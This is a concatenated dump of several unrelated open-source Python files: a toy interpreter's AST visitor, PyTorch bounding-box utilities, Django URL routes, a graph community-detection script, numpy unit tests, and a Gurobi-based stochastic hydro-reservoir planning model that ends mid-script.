keywords.\n for _, case_body in node.switch_cases[start_case_idx:]:\n ret_val = case_body.accept(self)\n if ret_val is not None:\n if ret_val.obj_type == ObjectType.BREAK:\n return\n else:\n return ret_val\n\n # Execute the default case if it is provided.\n if node.default_case is not None:\n return node.default_case.accept(self)\n\n def visit_func_def(self, node):\n curr_scope = self.env.peek()\n # Register the function in the current frame\n curr_scope.initialize_variable(node.name, FuncObject(node.name, node.args, node.body, curr_scope))\n\n def visit_class_def(self, node):\n \"\"\"\n Keyword Arguments:\n node -- Class definition node\n \"\"\"\n curr_scope = self.env.peek()\n # Register the class in the scope\n curr_scope.initialize_variable(node.class_name, ClassDefObject(node.class_name, node.class_methods))\n\n def __run_native_function(self, func_object, call_args):\n if func_object.arity != len(call_args):\n raise InternalRuntimeError(\n \"Function '{}' accepts only {} arguments but {} were given\".format(\n func_object.name, func_object.arity, len(call_args)\n )\n )\n\n evaluated_args = list()\n for arg in call_args:\n val = arg.accept(self)\n evaluated_args.append(val)\n\n # Using the \"*\" operator will destructure the list of evaluated internal object\n # arguments into the arguments which the function accepts.\n return func_object.body(*evaluated_args)\n\n def __run_internal_function(self, func_object, call_args):\n \"\"\"\n Runs the function represented by func_object. 
The arguments passed are supplied\n by the call_args in the form of a list.\n \"\"\"\n # Evaluate the arguments\n arg_values = list()\n for arg in call_args:\n val = arg.accept(self)\n arg_values.append(val)\n\n if len(arg_values) != func_object.arity:\n msg = 'function \"{}\" accepts only {} arguments but {} were given!'.format(\n func_object.name,\n func_object.arity,\n len(arg_values),\n )\n raise InternalRuntimeError(msg)\n\n if func_object.obj_type == ObjectType.FUNC:\n # Create a new scope\n self.env.enter_scope(func_object.env)\n elif func_object.obj_type == ObjectType.CLASS_METHOD:\n self.env.enter_scope(func_object.class_env)\n self.env.peek().initialize_variable(\"this\", func_object.class_env)\n\n # Add arguments to the current environment\n for arg_pair in zip(func_object.args, arg_values):\n self.env.peek().initialize_variable(arg_pair[0].lexeme, arg_pair[1])\n\n for stmnt in func_object.body:\n ret_val = stmnt.accept(self)\n if ret_val is not None and ret_val.obj_type in [\n ObjectType.RETURN,\n ObjectType.BREAK,\n ObjectType.CONTINUE,\n ]:\n if ret_val.obj_type == ObjectType.RETURN:\n return ret_val\n elif ret_val.obj_type == ObjectType.BREAK:\n msg = '\"break\" statement not used within a loop or a switch block!'\n raise InternalRuntimeError(msg)\n elif ret_val.obj_type == ObjectType.CONTINUE:\n msg = '\"continue\" statement not used within a loop!'\n raise InternalRuntimeError(msg)\n return None\n\n def visit_call(self, node):\n call_object = node.object_name.accept(self)\n\n # Case of function object\n if call_object.obj_type in [ObjectType.FUNC, ObjectType.CLASS_METHOD]:\n ret_val = self.__run_internal_function(call_object, node.call_args)\n self.env.exit_scope()\n if ret_val is None or ret_val.value is None:\n return NilObject()\n else:\n return ret_val.value\n\n elif call_object.obj_type == ObjectType.NATIVE_FUNC:\n return self.__run_native_function(call_object, node.call_args)\n\n elif call_object.obj_type == ObjectType.CLASS_DEF:\n instance_ptr = ClassInstanceObject(call_object.class_name, call_object.class_methods)\n # Enter new scope to register \"this\" namespace\n self.env.enter_scope(instance_ptr.namespace)\n self.env.peek().initialize_variable(\"this\", instance_ptr.namespace)\n\n class_constructor = instance_ptr.get_field(\"constructor\")\n if class_constructor is None and len(node.call_args) != 0:\n raise InternalRuntimeError(\n (\n \"Class '{}' does not have a constructor method but \"\n \"initialization detected {} arguments passed.\"\n ).format(call_object.class_name, len(node.call_args))\n )\n elif class_constructor is not None:\n self.__run_internal_function(class_constructor, node.call_args)\n\n self.env.exit_scope()\n return instance_ptr\n else:\n raise InternalRuntimeError(\"Object is not callable!\")\n\n def visit_dot_node(self, node):\n left = node.left.accept(self)\n\n if isinstance(left, Scope):\n val = left.get_variable(node.right.val)\n if val is not None:\n return val\n else:\n err_msg = \"Current environment does not contain the variable {}\".format(node.right.val)\n raise InternalRuntimeError(err_msg)\n elif left.obj_type == ObjectType.MODULE:\n val = left.namespace.get_variable(node.right.val)\n if val is not None:\n return val\n else:\n err_msg = \"Module environment does not contain the variable {}\".format(node.right.lexeme)\n raise InternalRuntimeError(err_msg)\n elif left.obj_type == ObjectType.CLASS_INSTANCE:\n val = left.get_field(node.right.val)\n if val is not None:\n return val\n else:\n err_msg = ('Class instance \"{}\" of class 
\"{}\" does not contain a field ' 'with name \"{}\"').format(\n node.left.val, left.class_name, node.right.val\n )\n raise InternalRuntimeError(err_msg)\n else:\n err_msg = \"variable {} is not accessible!\".format(node.left.val)\n raise InternalRuntimeError(err_msg)\n\n def visit_this(self):\n curr_scope = self.env.peek()\n while curr_scope.parent is not None:\n curr_scope = curr_scope.parent\n return curr_scope\n\n def visit_return(self, node):\n if node.expr is None:\n return ReturnObject(NilObject())\n\n return_val = node.expr.accept(self)\n return ReturnObject(return_val)\n\n def visit_continue(self):\n return ContinueObject()\n\n def visit_break(self):\n return BreakObject()\n\n def visit_do_while(self, node):\n # First execution of the body which always happens\n ret_val = node.body.accept(self)\n if ret_val is not None:\n # Exit loop early using return\n if ret_val.obj_type == ObjectType.BREAK:\n return\n # There is no need to do anything here. We need to reevaluate the test\n # condition for the loop.\n elif ret_val.obj_type == ObjectType.CONTINUE:\n pass\n # \"return\" value is floated up\n else:\n return ret_val\n\n # Subsequent executions which depend on the ocndition\n cond_value = node.cond.accept(self)\n while is_truthy(cond_value):\n # Detect any usage of return\n ret_val = node.body.accept(self)\n if ret_val is not None:\n # Exit loop early using return\n if ret_val.obj_type == ObjectType.BREAK:\n return\n # There is no need to do anything here. We need to reevaluate the test\n # condition for the loop.\n elif ret_val.obj_type == ObjectType.CONTINUE:\n continue\n # \"return\" value is floated up\n else:\n return ret_val\n cond_value = node.cond.accept(self)\n\n def visit_array(self, node):\n eval_elem = list()\n for elem in node.elements:\n elem_val = elem.accept(self)\n eval_elem.append(elem_val)\n\n return ArrayObject(eval_elem)\n\n def visit_array_access(self, node):\n array_obj = node.array_name.accept(self)\n array_idx = node.array_pos.accept(self)\n if array_obj.obj_type != ObjectType.ARRAY:\n err_str = \"Object is not an array and cannot be accessed using '[]'!\"\n raise InternalRuntimeError(err_str)\n if array_idx.obj_type != ObjectType.INT:\n err_str = \"Array index is not a number but a '{}'!\".format(str(array_idx.obj_type))\n raise InternalRuntimeError(err_str)\n if array_idx.value < array_obj.size:\n return array_obj.elements[array_idx.value]\n else:\n msg = \"Array has a size of {} but you want to access position {}\".format(array_obj.size, array_idx.value)\n raise InternalRuntimeError(msg)\n\n def visit_incr(self, node):\n node_val = node.value.accept(self)\n node_val.value += 1\n return node_val\n\n def visit_decr(self, node):\n node_val = node.value.accept(self)\n node_val.value -= 1\n return node_val\n\n def visit_nil(self):\n return NilObject()\n\n def visit_import(self, node):\n module_name = node.module_name + \".zai\"\n module_path, module_text = read_module_contents(module_name)\n if module_text is None:\n err_msg = \"Module {} could not be found within the interpreter path.\".format(node.filename)\n raise InternalRuntimeError(err_msg)\n\n # Initialize lexer and environment used to execute module contents\n lexer = Lexer()\n import_env = EnvironmentStack()\n\n # Lex and parse module contents\n tok_stream = lexer.tokenize_string(module_text)\n parser = Parser(tok_stream, module_text)\n root = parser.parse()\n\n import_visitor = Visitor(import_env)\n import_visitor.visit(root)\n # Take the module's global environment to be added to the namespace.\n 
import_scope = import_visitor.env.peek()\n\n # Determine the name with which the module will be accessed.\n module_env_name = node.module_name\n if node.import_name is not None:\n module_env_name = node.import_name\n\n self.env.peek().initialize_variable(\n module_env_name,\n ModuleObject(node.module_name, module_path, import_scope, module_env_name),\n )\n\n def visit_add_assign(self, node):\n # Symbol name will always be an id node\n symbol_name = node.symbol_name.val\n # Evaluate the right hand side containing the value which will be assigned\n new_value = node.increment.accept(self)\n\n # Find if a path to the variable exists\n symbol_path = None\n if node.symbol_path is None:\n current_scope = self.env.peek()\n old_val = current_scope.get_variable(symbol_name)\n status = current_scope.replace_variable(symbol_name, old_val + new_value)\n if status is False:\n err_msg = (\n 'Variable \"{}\" cannot be reasigned because it does not exist' \" within the environment.\"\n ).format(symbol_name)\n raise InternalRuntimeError(err_msg)\n else:\n symbol_path = node.symbol_path.accept(self)\n if isinstance(symbol_path, Scope):\n old_val = symbol_path.get_variable(symbol_name)\n status = symbol_path.replace_variable(symbol_name, old_val + new_value)\n if status is False:\n err_msg = (\n 'Variable \"{}\" cannot be reasigned because it does not'\n \"exist within the current class environment.\"\n ).format(symbol_name)\n raise InternalRuntimeError(err_msg)\n elif symbol_path.obj_type in [ObjectType.MODULE, ObjectType.CLASS_INSTANCE]:\n old_val = symbol_path.namespace.get_variable(symbol_name)\n status = symbol_path.namespace.replace_variable(symbol_name, old_val + new_value)\n if status is False:\n err_msg = ('Variable \"{}\" cannot be reasigned because it does not ' \"exist.\").format(symbol_name)\n raise InternalRuntimeError(err_msg)\n\n def visit_sub_assign(self, node):\n # Symbol name will always be an id node\n symbol_name = node.symbol_name.val\n # Evaluate the right hand side containing the value which will be assigned\n new_value = node.decrement.accept(self)\n\n # Find if a path to the variable exists\n symbol_path = None\n if node.symbol_path is None:\n current_scope = self.env.peek()\n old_val = current_scope.get_variable(symbol_name)\n status = current_scope.replace_variable(symbol_name, old_val - new_value)\n if status is False:\n err_msg = (\n 'Variable \"{}\" cannot be reasigned because it does not exist' \" within the environment.\"\n ).format(symbol_name)\n raise InternalRuntimeError(err_msg)\n else:\n symbol_path = node.symbol_path.accept(self)\n if isinstance(symbol_path, Scope):\n old_val = symbol_path.get_variable(symbol_name)\n status = symbol_path.replace_variable(symbol_name, old_val - new_value)\n if status is False:\n err_msg = (\n 'Variable \"{}\" cannot be reasigned because it does not '\n \"exist within the current class environment.\"\n ).format(symbol_name)\n raise InternalRuntimeError(err_msg)\n elif symbol_path.obj_type in [ObjectType.MODULE, ObjectType.CLASS_INSTANCE]:\n old_val = symbol_path.namespace.get_variable(symbol_name)\n status = symbol_path.namespace.replace_variable(symbol_name, old_val - new_value)\n if status is False:\n err_msg = ('Variable \"{}\" cannot be reasigned because it does not ' \"exist.\").format(symbol_name)\n raise 
InternalRuntimeError(err_msg)\n","repo_name":"sehnsucht13/zai-pl","sub_path":"zai/visitor.py","file_name":"visitor.py","file_ext":"py","file_size_in_byte":25615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"21838969343","text":"import torch\nimport torch.distributed as dist\nimport torch.nn.functional as F\nfrom detectron2.utils.comm import get_world_size\n\n\ndef reduce_sum(tensor):\n world_size = get_world_size()\n if world_size < 2:\n return tensor\n tensor = tensor.clone()\n dist.all_reduce(tensor, op=dist.ReduceOp.SUM)\n return tensor\n\n\ndef aligned_bilinear(tensor, factor):\n assert tensor.dim() == 4\n assert factor >= 1\n assert int(factor) == factor\n\n if factor == 1:\n return tensor\n\n h, w = tensor.size()[2:]\n tensor = F.pad(tensor, pad=(0, 1, 0, 1), mode=\"replicate\")\n oh = factor * h + 1\n ow = factor * w + 1\n tensor = F.interpolate(tensor, size=(oh, ow), mode=\"bilinear\", align_corners=True)\n tensor = F.pad(tensor, pad=(factor // 2, 0, factor // 2, 0), mode=\"replicate\")\n\n return tensor[:, :, : oh - 1, : ow - 1]\n\n\ndef compute_locations(h, w, stride, device):\n shifts_x = torch.arange(\n 0, w * stride, step=stride, dtype=torch.float32, device=device\n )\n shifts_y = torch.arange(\n 0, h * stride, step=stride, dtype=torch.float32, device=device\n )\n shift_y, shift_x = torch.meshgrid(shifts_y, shifts_x)\n shift_x = shift_x.reshape(-1)\n shift_y = shift_y.reshape(-1)\n locations = torch.stack((shift_x, shift_y), dim=1) + stride // 2\n return locations\n\n\ndef distance2bbox(points, distance, max_shape=None):\n \"\"\"Decode distance prediction to bounding box.\n\n Args:\n points (Tensor): Shape (n, 2), [x, y].\n distance (Tensor): Distance from the given point to 4\n boundaries (left, top, right, bottom).\n max_shape (tuple): Shape of the image.\n\n Returns:\n Tensor: Decoded bboxes.\n \"\"\"\n x1 = points[:, 0] - distance[:, 0]\n y1 = points[:, 1] - distance[:, 1]\n x2 = points[:, 0] + distance[:, 2]\n y2 = points[:, 1] + distance[:, 3]\n if max_shape is not None:\n x1 = x1.clamp(min=0, max=max_shape[1])\n y1 = y1.clamp(min=0, max=max_shape[0])\n x2 = x2.clamp(min=0, max=max_shape[1])\n y2 = y2.clamp(min=0, max=max_shape[0])\n return torch.stack([x1, y1, x2, y2], -1)\n\n\ndef bbox2distance(points, bbox, max_dis=None, eps=0.1):\n \"\"\"Decode bounding box based on distances.\n\n Args:\n points (Tensor): Shape (n, 2), [x, y].\n bbox (Tensor): Shape (n, 4), \"xyxy\" format\n max_dis (float): Upper bound of the distance.\n eps (float): a small value to ensure target < max_dis, instead <=\n\n Returns:\n Tensor: Decoded distances.\n \"\"\"\n left = points[:, 0] - bbox[:, 0]\n top = points[:, 1] - bbox[:, 1]\n right = bbox[:, 2] - points[:, 0]\n bottom = bbox[:, 3] - points[:, 1]\n if max_dis is not None:\n left = left.clamp(min=0, max=max_dis - eps)\n top = top.clamp(min=0, max=max_dis - eps)\n right = right.clamp(min=0, max=max_dis - eps)\n bottom = bottom.clamp(min=0, max=max_dis - eps)\n return torch.stack([left, top, right, bottom], -1)\n","repo_name":"facebookresearch/unbiased-teacher-v2","sub_path":"ubteacher/utils/comm.py","file_name":"comm.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"96"} +{"seq_id":"18688965844","text":"from . 
import views\nfrom django.urls import path, include\nfrom .views import (\n AnswerListView,\n UserAnswersListView,\n AnswerDetailView,\n AnswerUpdateView,\n AnswerCreateView,\n AnswerDeleteView,\n UserExerciseListView,\n ExerciseDetailView,\n ExerciseListView,\n ExerciseUpdateView,\n ExerciseDeleteView,\n ExerciseCreateView,\n SubjectListView,\n SubjectDetailView,\n SubjectUpdateView,\n SubjectDeleteView,\n SubjectCreateView,\n UserSubjectListView,\n TopicListView,\n TopicDetailView,\n TopicUpdateView,\n TopicDeleteView,\n TopicCreateView,\n UserTopicListView,\n LessonListView,\n LessonDetailView,\n LessonUpdateView,\n LessonDeleteView,\n LessonCreateView,\n UserLessonListView,\n TodayListView,\n TodayDetailView,\n TodayUpdateView,\n TodayDeleteView,\n TodayCreateView,\n UserTodayListView\n\n)\n\n\nurlpatterns = [\n path('subjects', SubjectListView.as_view(), name='subject-list'),\n path('subject//', SubjectDetailView.as_view(), name='subject-detail'),\n path('subject/new/', SubjectCreateView.as_view(), name='subject-create'),\n path('subject//update/', SubjectUpdateView.as_view(), name='subject-update'),\n path('subject//delete/', SubjectDeleteView.as_view(), name='subject-delete'),\n path('user/', UserSubjectListView.as_view(), name='user-subjects'),\n path('topics', TopicListView.as_view(), name='topic-list'),\n path('topic//', TopicDetailView.as_view(), name='topic-detail'),\n path('topic/new/', TopicCreateView.as_view(), name='topic-create'),\n path('topic//update/', TopicUpdateView.as_view(), name='topic-update'),\n path('topic//delete/', TopicDeleteView.as_view(), name='topic-delete'),\n path('user/', UserTopicListView.as_view(), name='user-topics'),\n path('lesson//', LessonDetailView.as_view(), name='lesson-detail'),\n path('lessons', LessonListView.as_view(), name='lesson-list'),\n path('lesson/new/', LessonCreateView.as_view(), name='lesson-create'),\n path('lesson//update/', LessonUpdateView.as_view(), name='lesson-update'),\n path('lesson//delete/', LessonDeleteView.as_view(), name='lesson-delete'),\n path('user/', UserLessonListView.as_view(), name='user-lessons'),\n path('exercises', ExerciseListView.as_view(), name='exercises'),\n path('exercise//', ExerciseDetailView.as_view(), name='exercise-detail'),\n path('exercise/new/', ExerciseCreateView.as_view(), name='exercise-create'),\n path('exercise//update/', ExerciseUpdateView.as_view(), name='exercise-update'),\n path('exercise//delete/', ExerciseDeleteView.as_view(), name='exercise-delete'),\n path('user/', UserExerciseListView.as_view(), name='user-exercises'),\n path('answers', AnswerListView.as_view(), name='answer-list'),\n path('answer/new/', AnswerCreateView.as_view(), name='answer-create'),\n path('answer//', AnswerDetailView.as_view(), name='answer-detail'),\n path('answer//update/', AnswerUpdateView.as_view(), name='answer-update'),\n path('answer//delete/', AnswerDeleteView.as_view(), name='answer-delete'),\n path('user/', UserAnswersListView.as_view(), name='user-answers'),\n path('', views.answer, name='answer'),\n path('todays', TodayListView.as_view(), name='today-list'),\n path('today//', TodayDetailView.as_view(), name='today-detail'),\n path('today/new/', TodayCreateView.as_view(), name='today-create'),\n path('today/update/', TodayUpdateView.as_view(), name='today-update'),\n path('today//delete/', TodayDeleteView.as_view(), name='today-delete'),\n path('user/', UserTodayListView.as_view(), name='user-todays'),\n] 
","repo_name":"Fabricourt/school","sub_path":"subjects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"73528062716","text":"from sklearn.metrics import normalized_mutual_info_score\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport community\nimport networkx as nx\n\n\ndef community_detection(gnx: nx.Graph, node_order, encoding, true_labels, alpha: float = 1):\n node_to_idx = {str(node): i for i, node in enumerate(node_order)}\n similarity_matrix = cosine_similarity(encoding.tolist())\n for u in gnx.nodes():\n for v in gnx.nodes():\n if (u, v) in gnx.edges():\n # 1 * (1 - alpha) + alpha * similarity\n gnx.edges()[(u, v)]['weight'] = (1 - alpha) + \\\n (alpha * abs(similarity_matrix[node_to_idx[u], node_to_idx[v]]))\n else:\n # 0 * (1 - alpha) + alpha * similarity\n gnx.add_edge(u, v)\n gnx.edges()[(u, v)]['weight'] = (alpha * abs(similarity_matrix[node_to_idx[u], node_to_idx[v]]))\n\n partition = community.best_partition(gnx)\n score = normalized_mutual_info_score([partition[n] for n in node_order], true_labels)\n return partition, score\n\n\ndef encode_by_labels(dataset, gcn_params, activator_params):\n model = MultiLevelGCN(gcn_params(ftr_len=dataset.len_features, num_classes=dataset.num_classes))\n activator = MultiClassGCNActivator(model, activator_params(), dataset, nni=False)\n activator.train(show_plot=False, validation_rate=10, early_stop=True)\n encodings = activator.encode_graph()\n return encodings\n\n\nif __name__ == \"__main__\":\n from gcn_model import MultiLevelGCN\n from dataset.dataset_model import GnxDataset\n from multi_class_gcn_activator import MultiClassGCNActivator\n from params.parameters import DatasetParams, MultiLevelGCNParams, GCNActivatorParams\n from params.cora_params import CoraDatasetParams, CoraMultiLevelGCNParams, CoraGCNActivatorParams\n # from params.eu_email_params import EuEmailDatasetParams, EuEmailMultiLevelGCNParams, EuEmailGCNActivatorParams\n\n ds_ = GnxDataset(CoraDatasetParams())\n true_labels_ = [ds_.label_by_node_name(node) for node in ds_.node_order]\n\n encodings_ = encode_by_labels(ds_, CoraMultiLevelGCNParams, CoraGCNActivatorParams)\n\n scores_ = {}\n for alpha_ in [i / 10 for i in range(1, 11)]:\n partition_, score_ = community_detection(ds_.gnx, ds_.node_order, encodings_, true_labels_, alpha=alpha_)\n scores_[alpha_] = score_\n print(alpha_, score_)\n\n for alpha_, score_ in scores_.items():\n print(alpha_, score_)\n\n","repo_name":"louzounlab/comuniy_detection","sub_path":"cummunity_detection.py","file_name":"cummunity_detection.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"6461710722","text":"import numpy\nimport mysum2d\n\ndef test_mysum_lists():\n\tA = numpy.array([[1,2],[3,4]])\n\tB = numpy.array([[4],[5]])\n\t\n\tC_expected = numpy.array([[1*4 + 2*5], [3*4 + 4*5]])\n\tC = mysum2d.mysum_lists(A, B)\n\t\n\tnumpy.testing.assert_allclose(C, C_expected)\n\tassert C.shape == C_expected.shape, (\"shapes are weird\", C.shape, C_expected.shape)\n\tassert (C == C_expected).all()\n\t\ndef test_mysum_numpy():\n\tA = numpy.array([[1,2],[3,4]])\n\tB = numpy.array([[4],[5]])\n\t\n\tC_expected = numpy.array([[1*4 + 2*5], [3*4 + 4*5]])\n\tC = mysum2d.mysum_numpy(A, B)\n\tnumpy.testing.assert_allclose(C, C_expected)\n\t\ndef test_mysum_einsum():\n\tA = numpy.array([[1,2],[3,4]])\n\tB = 
numpy.array([[4],[5]])\n\t\n\tC_expected = numpy.array([[1*4 + 2*5], [3*4 + 4*5]])\n\tC = mysum2d.mysum_einsum(A, B)\n\tnumpy.testing.assert_allclose(C, C_expected)\n\n\ndef test_wrong_mysum_numpy():\n\tA = numpy.array([[1,2],[3,4]])\n\tB = numpy.array([[4,5]])\n\t\n\tfailed = False\n\t\n\ttry:\n\t\tC = mysum2d.mysum_numpy(A, B)\n\texcept ValueError as e:\n\t\tfailed = True\n\t\n\tassert failed, \"assert was raised as expected\"\n\n\nimport pytest\ndef test_wronginput_mysum_lists():\n\tA = numpy.array([[1,2],[3,4]])\n\tB = numpy.array([[4,5]])\n\t\n\twith pytest.raises(AssertionError):\n\t\tmysum2d.mysum_lists(A, B)\n\nimport pytest\ndef test_wronginput_mysum_numpy():\n\tA = numpy.array([[1,2],[3,4]])\n\tB = numpy.array([[4,5]])\n\t\n\twith pytest.raises(ValueError):\n\t\tmysum2d.mysum_numpy(A, B)\n\n\n\n\n\n","repo_name":"JohannesBuchner/S4","sub_path":"test_mysum.py","file_name":"test_mysum.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"43431801142","text":"'''\nCreated on Jan 3, 2018\n\n@author: dduque\n'''\nimport csv\nimport SDDP\nimport logging\nimport numpy as np\nfrom Utils.file_savers import write_object_results\nnp.set_printoptions(linewidth= 200, nanstr='nen')\nfrom SDDP.RandomnessHandler import RandomContainer, StageRandomVector, AR1_depedency\nfrom SDDP.SDDP_Alg import SDDP\nfrom SDDP import logger as sddp_log\n\nfrom Utils.argv_parser import sys,parse_args\nfrom gurobipy import *\nfrom InstanceGen.ReservoirChainGen import read_instance, HydroRndInstance\nfrom HydroExamples import *\nfrom SDDP.RiskMeasures import DistRobust, PhilpottInnerDROSolver, DistRobustDuality,\\\n InnerDROSolverX2, DistRobustWasserstein, mod_chi2, DistRobustWassersteinCont\nfrom OutputAnalysis.SimulationAnalysis import plot_sim_results,\\\n plot_metrics_comparison, plot_lbs\nfrom SDDP.RandomManager import experiment_desing_gen,\\\n reset_experiment_desing_gen\n\n'''\nGlobal variables to store instance data\n'''\nT = None\nnr = None\nlag = None\ndro_radius = None\nRmatrix = None\nRHSnoise = None\ninitial_inflow = None \nvalley_chain = None\nvalley_chain_oos = None\nprices = None\nWater_Penalty = 10000\n\ndef random_builder():\n rc = RandomContainer()\n rndVectors = []\n for t in range(0,T):\n rv_t = StageRandomVector(t)\n rc.append(rv_t)\n for (i,r) in enumerate(valley_chain):\n if t>0:\n re = rv_t.addRandomElement('innovations[%i]' %(i), r.inflows)\n else:\n re = rv_t.addRandomElement('innovations[%i]' %(i), [0.0])\n rndVectors.append(rv_t)\n rc.preprocess_randomness()\n return rc\n\ndef random_builder_out_of_sample(vally_chain_sample):\n '''\n Generates a random container for out-of-sample performance.\n '''\n rc = RandomContainer()\n rndVectors = []\n for t in range(0,T):\n rv_t = StageRandomVector(t)\n rc.append(rv_t)\n for (i,r) in enumerate(vally_chain_sample):\n if t>0:\n re = rv_t.addRandomElement('innovations[%i]' %(i), r.inflows)\n else:\n re = rv_t.addRandomElement('innovations[%i]' %(i), [0.0])\n rndVectors.append(rv_t)\n rc.preprocess_randomness()\n return rc\n\n\n\ndef model_builder(stage):\n '''\n Builds a particular instance of a multistage problem\n '''\n import gurobipy as gb\n m = Model('Hydrovalley')\n \n '''\n State variables\n - Reservoir level\n - Inflows of previous time periods (according to the lag)\n '''\n #Reservoir level\n reservoir_level = m.addVars(nr, \n lb = [r.min for r in valley_chain], \n ub = [r.max for r in valley_chain], \n obj = 0,\n vtype=GRB.CONTINUOUS, \n 
name='reservoir_level')\n reservoir_level0 = m.addVars(nr, \n lb = 0, \n ub = 0, \n obj = 0,\n vtype=GRB.CONTINUOUS, \n name='reservoir_level0')\n lag_set = list(range(1,lag+1))\n inflow = m.addVars(nr, lag_set ,lb=-GRB.INFINITY, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name='inflow')\n inflow0 = m.addVars(nr, lag_set, lb=0, ub=0, obj=0, vtype=GRB.CONTINUOUS, name='inflow0')\n \n #RHS noise\n innovations = m.addVars(nr,lb=-GRB.INFINITY, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name='innovations')\n \n outflow = m.addVars(nr, lb=0, obj=0, vtype=GRB.CONTINUOUS, name='outflow')\n spill = m.addVars(nr, lb=0, obj=0, vtype=GRB.CONTINUOUS, name='spill')\n pour = m.addVars(nr, lb=0, obj=0, vtype=GRB.CONTINUOUS, name='pour')\n generation = m.addVar(lb=0, obj=0, vtype=GRB.CONTINUOUS, name='generation')\n dispatch = m.addVars([(ri,tf) for (ri,r) in enumerate(valley_chain) for tf in range(0,len(r.turbine.flowknots))],\n lb=0,ub=1,obj=0,vtype= GRB.CONTINUOUS,name='dispatch')\n if stage == 0:\n for v in reservoir_level0:\n reservoir_level0[v].lb = valley_chain[v].initial\n reservoir_level0[v].ub = valley_chain[v].initial\n for v in inflow0:\n v_lag = v[1] #Lag id\n v_res = v[0] #Reservoir id\n inflow0[v].lb = initial_inflow[-v_lag-1][v_res]\n inflow0[v].ub = initial_inflow[-v_lag-1][v_res]\n inflow[v].lb = initial_inflow[-v_lag][v_res]\n inflow[v].ub = initial_inflow[-v_lag][v_res]\n \n m.update()\n \n in_state = [v.VarName for v in reservoir_level0.values()]\n in_state.extend((v.VarName for v in inflow0.values()))\n out_state = [v.VarName for v in reservoir_level.values()]\n out_state.extend((v.VarName for v in inflow.values()))\n rhs_vars = [v.VarName for v in innovations.values()]\n \n #Constraints\n #AR model for the stage\n R_t = Rmatrix[stage] #For lag 1 only!\n m.addConstrs((inflow[i,1] == sum(R_t[l][i][j]*inflow0[j,l] for l in lag_set for j in R_t[l][i]) + innovations[i] for i in range(0,len(valley_chain)) ), 'AR_model_%i' %(1))\n m.addConstrs((inflow[i,l] == inflow0[i,l-1] for l in range(2,lag+1) for i in range(0,len(valley_chain))), 'AR_model')\n \n \n #R_t = Rmatrix[stage] #For lag 1 only!\n #m.addConstrs((inflow[i] - sum(R_t[1][i][j]*inflow0[j] for j in range(0,len(valley_chain)) if j in R_t[1][i]) == innovations[i] for i in range(0,len(valley_chain)) ), 'AR1')\n #Balance constraints\n #===========================================================================\n # m.addConstr(reservoir_level[0] == reservoir_level0[0] + sum(R_t[l][0][j]*inflow0[j,l] for l in lag_set for j in R_t[l][0]) + innovations[0] - outflow[0] - spill[0] + pour[0], 'balance[0]')\n # m.addConstrs((reservoir_level[i] == reservoir_level0[i] + sum(R_t[l][i][j]*inflow0[j,l] for l in lag_set for j in R_t[l][i])+ innovations[i] - outflow[i] - spill[i] + pour[i] + outflow[i-1] + spill[i-1] for i in range(1,nr)), 'balance')\n #===========================================================================\n \n m.addConstr(reservoir_level[0] == reservoir_level0[0] + inflow[0,1] - outflow[0] - spill[0] + pour[0], 'balance[0]')\n m.addConstrs((reservoir_level[i] == reservoir_level0[i] + inflow[i,1] - outflow[i] - spill[i] + pour[i] + outflow[i-1] + spill[i-1] for i in range(1,nr)), 'balance') \n \n \n #Generation\n m.addConstr(generation==quicksum(r.turbine.powerknots[level] * dispatch[i,level] for (i,r) in enumerate(valley_chain) for level in range(0,len(r.turbine.flowknots))), 'generationCtr')\n\n # Flow out\n for (i,r) in enumerate(valley_chain):\n m.addConstr(outflow[i] == quicksum(r.turbine.flowknots[level] * dispatch[i, 
level] for level in range(len(r.turbine.flowknots))), 'outflowCtr[%i]' %(i))\n \n #Dispatched\n for (i,r) in enumerate(valley_chain):\n m.addConstr(quicksum(dispatch[i, level] for level in range(len(r.turbine.flowknots)))<= 1, 'dispatchCtr[%i]' %(i))\n #Objective\n objfun = -prices[stage]*generation + quicksum(0*r.spill_cost*spill[i] for (i,r) in enumerate(valley_chain)) + quicksum(r.spill_cost*pour[i] for (i,r) in enumerate(valley_chain))\n m.setObjective(objfun, GRB.MINIMIZE)\n m.update()\n if stage == -1:\n print(initial_inflow)\n print_model(m)\n return m, in_state, out_state, rhs_vars\n\ndef print_model(m):\n for c in m.getConstrs(): print(c.ConstrName, m.getRow(c) , ' ', c.Sense, ' ', c.RHS)\n for v in m.getVars(): print(v.varname, ' ' , v.lb , ' --- ', v.ub)\n #for v in m.getVars(): print(v)\n \nif __name__ == '__main__':\n argv = sys.argv\n positional_args,kwargs = parse_args(argv[1:])\n if 'R' in kwargs:\n nr = kwargs['R']\n if 'T' in kwargs:\n T = kwargs['T']\n if 'max_iter' in kwargs:\n SDDP.options['max_iter'] = 100#kwargs['max_iter']\n SDDP.options['lines_freq'] = 1#int(SDDP.options['max_iter']/10)\n if 'sim_iter' in kwargs:\n SDDP.options['sim_iter'] = kwargs['sim_iter']\n if 'lag' in kwargs:\n lag = kwargs['lag']\n if 'dro_radius' in kwargs:\n dro_radius = kwargs['dro_radius']\n if 'N' in kwargs:\n N = kwargs['N']\n \n sddp_log.addHandler(logging.FileHandler(\"HydroAR%i_ESS.log\" %(lag), mode='w'))\n hydro_instance = read_instance('hydro_rnd_instance_R10_UD1_T120_LAG1_OUT10K_AR.pkl' , lag = lag)\n \n \n instance_name = \"Hydro_R%i_AR%i_T%i_I%i_ESS\" % (nr, lag, T, SDDP.options['max_iter'])\n Rmatrix = hydro_instance.ar_matrices\n RHSnoise_density = hydro_instance.RHS_noise[0:nr]\n N_training = N\n #Reset experiment design stream \n reset_experiment_desing_gen()\n train_indeces = set(experiment_desing_gen.choice(range(len(RHSnoise_density[0])),size=N_training, replace = False))\n 